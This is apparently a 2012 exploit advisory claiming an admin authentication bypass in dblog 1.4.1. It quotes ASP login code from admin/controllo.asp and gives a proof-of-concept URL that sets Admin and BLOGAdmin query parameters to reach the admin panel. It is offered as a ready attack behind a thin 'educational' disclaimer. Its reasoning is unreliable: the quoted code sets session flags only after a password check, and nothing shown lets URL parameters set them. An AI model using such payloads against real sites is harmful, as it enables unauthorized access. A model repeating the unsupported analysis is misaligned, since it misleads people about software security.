facebook facebook twitter rss

dblog V1.4.1 Insecure Session \ Bypass Admin Vulnerability

Author: Asmar , Published: 03-06-2012
# -------------------------------- #
Author : L3b-r1'z
Date : 3/6/2012
Title : dblog Insecure Session \ Bypass Admin Vulnerability
Version : 1.4.1
Download : http://www.dblog.it/sito/download.asp
Dork : N\A
# -------------------------------- #
This proof of concept code was written for educational purpose only.
Use it at your own risk. Author will be not responsible for any damage.
# -------------------------------- #
1) Bug
2) P0c
# -------------------------------- #

1) Bug :

Vuln In File admin/controllo.asp .

in line 10 and 11 :
FUserID = Request.Form("UserID")
FPassword = Request.Form("Password")
we have here Request FORM Is Like $_POST
Lets See Below Of Code :)

#### Start ####

If NOT RSAutori.EOF Then
RSAutori.MoveFirst
If RSAutori("Password") = FPassword Then
Session("BLOGNick") = RSAutori("Nick")
Session.TimeOut = 60
If RSAutori("Admin") = True Then
Session("BLOGAdmin") = True
Else
Session("BLOGAdmin") = False
End If
Response.Redirect "default.asp"
Else
Session("BLOGNick") = ""
Session("BLOGAdmin") = False
Response.Redirect "login.asp"
End If
Else
Session("BLOGNick") = ""
Session("BLOGAdmin") = False
Response.Redirect "login.asp"
End If
Else
Session("BLOGNick") = ""
Session("BLOGAdmin") = False
Response.Redirect "login.asp"
End If

#### End ####

We have timeout 60 , that mean admin can be in page 60 min only , but when we bypass , we don't have any time :D
look to

If RSAutori("Admin") = True Then
Session("BLOGAdmin") = True

if admin true and BLOGAdmin true End If Response.Redirect "default.asp" Redirect To Admin Page :D , Else BLOGnick And BLOGAdmin False , Redirect To Login.asp File :D

# -------------------------------- #

2) p0c :

http://domain.tld/admin/login.asp?Admin=True&&BLOGAdmin=True

You Will See Admin Panel :)
# -------------------------------- #

Like us on Facebook :